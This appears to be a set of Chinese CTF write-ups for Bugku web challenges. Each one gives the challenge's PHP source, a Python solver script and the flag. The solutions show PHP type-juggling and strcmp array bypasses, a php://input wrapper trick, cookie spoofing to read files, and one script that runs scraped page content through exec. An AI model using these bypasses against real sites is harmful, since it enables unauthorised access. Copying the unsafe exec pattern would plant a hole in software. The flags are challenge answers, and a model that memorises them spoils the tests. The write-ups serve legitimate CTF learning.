秋名山老司机
http://123.206.87.240:8002/qiumingshan/
是不是老司机试试就知道。
解题脚本
# -*- coding:utf-8 -*- import urllib import re import requests # 获取源码 def page(pg): # = 'https://www.pengfu.com/index_%s.html' % pg html = urllib.urlopen(pg).read() # 读取所有源代码 return html # picture def content(html): reg = r'<div>(.*?)\=\?;</div>' item = re.findall(reg, html) return item # download def download(url, name): path = 'H:\image\%s.jpg' % name.decode('utf-8').encode('gbk') urllib.urlretrieve(url, path) if __name__ == '__main__': url = 'http://123.206.87.240:8002/qiumingshan/' r = requests.get(url) html = r.text content_list = content(html) code = content_list[0] result = 0 print code exec ('print ' + code) exec ('result = ' + code) print result payload = {"value": result} response = requests.post(url=url, data=payload, cookies=r.cookies) print(response.text)
Bugku{YOU_DID_IT_BY_SECOND}
速度要快
速度要快!!!!!!
http://123.206.87.240:8002/web6/
格式KEY{xxxxxxxxxxxxxx}
# -*- coding:utf-8 -*- import requests import base64 if __name__ == '__main__': url = 'http://123.206.87.240:8002/web6/' r = requests.get(url) html = r.text flag = base64.b64decode(r.headers['flag']) flag = base64.b64decode(flag.split(': ')[1]) payload = {"margin": flag} response = requests.post(url=url, data=payload, cookies=r.cookies) print(response.text)
KEY{111dd62fcd377076be18a}
cookies欺骗
http://123.206.87.240:8002/web11/
答案格式:KEY{xxxxxxxx}
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': url = 'http://123.206.87.240:8002/web11/index.php?line=&filename=aW5kZXgucGhw' for i in range(100): r = requests.get('http://123.206.87.240:8002/web11/index.php?line=' + str(i) + '&filename=aW5kZXgucGhw') print r.text # print i if r.text == '': break # 获得源码 # < ?php # # error_reporting(0); # # $file = base64_decode(isset($_GET['filename'])?$_GET['filename']:""); # # $line = isset($_GET['line'])?intval($_GET['line']):0; # # if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ="); # # $file_list = array( # # '0' = > 'keys.txt', # # '1' = > 'index.php', # # ); # # # # if (isset($_COOKIE['margin']) & & $_COOKIE['margin'] == 'margin'){ # # $file_list[2]='keys.php'; # # } # # if (in_array($file, $file_list)){ # # $fa = file($file); # # echo $fa[$line]; # # } # # ? > for i in range(100): r = requests.get('http://123.206.87.240:8002/web11/index.php?line=' + str(i) + '&filename=a2V5cy5waHA=', cookies={"margin": "margin"}) print r.text # print i if r.text == '': break
KEY{key_keys}
never give up
http://123.206.87.240:8006/test/hello.php
作者:御结冰城
访问后默认跳转到http://123.206.87.240:8006/test/hello.php?id=1,右键查看源代码发现1p.html页面,查看1p.html源代码发现一段js代码,复制到浏览器的console中执行一下,得到了一个base64字符串,将字符串先进行base64解码,再进行urldecode,得到一段php代码,php代码头部有缺失,补全后如下:
<?php if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) { require("f4l2a3g.txt"); } else { print "never never never give up !!!"; } ?>
代码审计题,需要传入三个参数,id需要==0 并且不能是false,所以使用id=0e绕过
if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); }
a中不能含有.,所以我们传入php://input,绕过
if(stripos($a,'.')) { echo 'no no no no no no no'; return ; }
file_get_contents('php://input','r')是可以读取从post中传来的数据,我们用post发送 bugku is a nice plateform! ,可以绕过。
使用b=*11111绕过下面的判断
strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4
最终的解题脚本如下:
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': url = 'http://123.206.87.240:8006/test/hello.php?id=0e&a=php://input&b=*11111' r = requests.post(url, data='bugku is a nice plateform!') print r.text
flag{tHis_iS_THe_fLaG}
字符?正则?
字符?正则?
http://123.206.87.240:8002/web10/
打开就是源码,绕过正则表达式就能得到flag,推荐使用一个插件Xeger,可以自动生成随机的符合正则表达式的字符串,不过我测试发现准确率一般,但是够用,比自己计算要快的多。
<?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ die('key is: '.$key); } ?>
解题脚本如下:
# -*- coding:utf-8 -*- from xeger import Xeger from urllib import unquote import requests import re _x = Xeger(limit=8) for i in range(8): pattern = re.compile('/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i') out = _x.xeger(pattern) url = 'http://123.206.87.240:8002/web10/?id=' + unquote(out) r = requests.get(url) print r.text
因为Xeger准确率不高,多测试几次就好了,我让它循环了8次,有一两次能通过
KEY{0x0SIOPh550afc}
前女友(SKCTF)
flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}
右键查看源代码得到code.txt
<?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v3, $flag)){ echo $flag; } } } ?>
代码审计md5== ,一看就知道是md5 0e判断,可以从http://www.liugongrui.com/?id=3这里面找两个。
strcmp($v3,$flag)是比较两个字符串是否相等,相等时返回值为0,我们不知道$flag是什么,要是知道也不用做这个题了,所以需要用 php的函数漏洞绕过判断,把$v3设置成数组就能让strcmp返回值变成false,解题如下:
http://123.206.31.85:49162/index.php?v1=s878926199a&v2=s155964671a&v3[]=f
SKCTF{Php_1s_tH3_B3St_L4NgUag3}